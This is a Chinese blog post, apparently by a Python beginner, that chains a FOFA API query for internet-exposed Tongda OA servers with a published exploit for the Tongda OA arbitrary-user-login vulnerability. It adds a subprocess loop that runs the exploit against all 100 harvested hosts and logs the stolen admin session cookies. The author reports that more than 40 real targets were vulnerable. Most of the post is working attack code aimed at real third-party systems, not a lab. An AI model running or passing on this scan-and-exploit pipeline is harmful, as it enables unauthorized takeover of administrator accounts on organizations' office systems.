• fofaAPI获取url并批量检测4.22通达oa任意用户登录漏洞


    Python练习时长7天半的成果,大佬留情

    问题

    fofa返回结果中有的带https://
    大佬的通达oaPOC无法处理https://,需要修改

    fofaAPI

    import requests
    import json
    import base64
    
    def main():
        email="" #email
        key="" #key
        targetsrting='app="通达OA"' #搜索关键字
        target=base64.b64encode(targetsrting.encode('utf-8')).decode("utf-8")
        page="1" #翻页数
        size="100" #每页返回记录数
        url="https://fofa.so/api/v1/search/all?email="+email+"&key="+key+"&qbase64="+target+"&size="+size
        #print(url)
        resp = requests.get(url)
        data_model = json.loads(resp.text)
    
        data_url=[]
        save=open('fofaurl.txt','w+')
    
        for i in data_model['results']: #取结果列表
            for j in i[0:1]: #取结果列表中的每个列表的url,需要IP则改为[1:2]
                data_url.append(j)
    
        for i in data_url:
            save.write(i+"
    ")
    
        save.close()
        #print(data_model)
    
    
    if __name__ == '__main__':
        main()
    

    大佬的POC加自己写的批量执行的脚本

    太菜了,不知道怎么修改POC批量测试目标,就百度了下PYTHON执行命令,循环100次。。。。。。

    大佬的POC

    '''
    @Author         : Sp4ce
    @Date           : 2020-03-17 23:42:16
    @LastEditors    : Sp4ce
    @LastEditTime   : 2020-04-22 16:24:52
    @Description    : Challenge Everything.
    '''
    import requests
    from random import choice
    import argparse
    import json
    
    USER_AGENTS = [
        "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
        "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)",
        "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
        "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
        "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
        "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",
        "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)",
        "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
        "Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
        "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
        "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0",
        "Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5",
        "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6",
        "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20",
        "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52",
        "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.11 TaoBrowser/2.0 Safari/536.11",
        "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71 Safari/537.1 LBBROWSER",
        "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; LBBROWSER)",
        "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E; LBBROWSER)",
        "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 LBBROWSER",
        "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
        "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; QQBrowser/7.0.3698.400)",
        "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
        "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; QQDownload 732; .NET4.0C; .NET4.0E; 360SE)",
        "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
        "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
        "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
        "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
        "Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; zh-cn) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5",
        "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b13pre) Gecko/20110307 Firefox/4.0b13pre",
        "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0",
        "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11",
        "Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10"
    ]
    
    headers={}
    
    def getV11Session(url):
        checkUrl = url+'/general/login_code.php'
        try:
            headers["User-Agent"] = choice(USER_AGENTS)
            res = requests.get(checkUrl,headers=headers)
            resText = str(res.text).split('{')
            codeUid = resText[-1].replace('}"}', '').replace('
    ', '')
            getSessUrl = url+'/logincheck_code.php'
            res = requests.post(
                getSessUrl, data={'CODEUID': '{'+codeUid+'}', 'UID': int(1)},headers=headers)
            print('[+]Get Available COOKIE:'+res.headers['Set-Cookie'])
        except:
            print('[-]Something Wrong With '+url)
    
    
    
    def get2017Session(url):
        checkUrl = url+'/ispirit/login_code.php'
        try:
            headers["User-Agent"] = choice(USER_AGENTS)
            res = requests.get(checkUrl,headers=headers)
            resText = json.loads(res.text)
            codeUid = resText['codeuid']
            codeScanUrl = url+'/general/login_code_scan.php'
            res = requests.post(codeScanUrl, data={'codeuid': codeUid, 'uid': int(
                1), 'source': 'pc', 'type': 'confirm', 'username': 'admin'},headers=headers)
            resText = json.loads(res.text)
            status = resText['status']
            if status == str(1):
                getCodeUidUrl = url+'/ispirit/login_code_check.php?codeuid='+codeUid
                res = requests.get(getCodeUidUrl)
                print('[+]Get Available COOKIE:'+res.headers['Set-Cookie'])
            else:
                print('[-]Something Wrong With '+url  + ' Maybe Not Vulnerable ?')
        except:
            print('[-]Something Wrong With '+url)
    
    
    if __name__ == "__main__":
        parser = argparse.ArgumentParser()
        parser.add_argument(
            "-v",
            "--tdoaversion",
            type=int,
            choices=[11, 2017],
            help="Target TongDa OA Version. e.g: -v 11、-v 2017")
        parser.add_argument(
            "-url",
            "--targeturl",
            type=str,
            help="Target URL. e.g: -url 192.168.2.1、-url http://192.168.2.1"
        )
        args = parser.parse_args()
        url = args.targeturl
        if 'http://' not in url:
            url = 'http://' + url
        if args.tdoaversion == 11:
            getV11Session(url)
        elif args.tdoaversion == 2017:
            get2017Session(url)
        else:
            parser.print_help()
    
    

    我的批量执行。。。。

    貌似v11和2017的POC相同,所以

    import subprocess
    import time
    
    
    def run_cmd2file(cmd):
        fdout = open("file_out.log",'a')
        fderr = open("file_err.log",'a')
        p = subprocess.Popen(cmd, stdout=fdout, stderr=fderr, shell=True)
        if p.poll():
            return
        p.wait()
        return
    
    if __name__ == '__main__':
        with open('fofaurl.txt', mode='r') as f:
            for line in f:
                run_cmd2file("python POC.py -v 11 -url "+line)
    

    结果怎么看?

    file_out.logfofaurl.txt对照着看吧,emmm
    检测结果100个里有超过40个存在漏洞,影响蛮大的

  • 相关阅读:
    C# 直接选择排序(史上最清晰,最通俗)
    Hadoop单节点伪分布式环境部署
    Hive安装和部署andMySQL安装和部署
    Kafka集群部署
    HA Hadoop完全分布式环境部署
    HBase集群部署
    Flume整合Kafka
    Hadoop完全分布式环境部署
    JavaScript正则表达式语法
    什么无线路由器性价高?买什么路由器好?
  • 原文地址:https://www.cnblogs.com/Rain99-/p/12773529.html
Copyright © 2020-2023  润新知